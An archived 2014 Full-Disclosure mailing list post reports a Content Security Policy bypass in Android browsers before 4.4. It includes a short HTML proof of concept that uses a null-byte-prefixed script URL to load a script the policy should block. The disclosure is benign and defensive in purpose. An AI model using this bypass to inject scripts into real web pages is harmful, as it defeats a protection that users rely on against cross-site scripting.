lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CA+wDdVbxxpYdQKOz0C77t+8oEj4kfhQ9kCmaOkOszpHCJUW3JQ@mail.gmail.com>
Date: Sat, 11 Oct 2014 16:09:51 -0400
From: E Boogie <evanjjohns@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CSP Bypass on Android prior to 4.4

I've found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  a.src='\u0000https://js.stripe.com/v2/';
  document.body.appendChild(a);
  setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{
alert(2);}}, 400);
  return false;">


The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;

The PoC worked if you see a popup containing stripes e(){} object. I
set the Timeout kind of short, so you may have to press the button
twice before you see the popup.

I have a PoC test page at ejj.io/test.php

Cheers,
Evan J

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists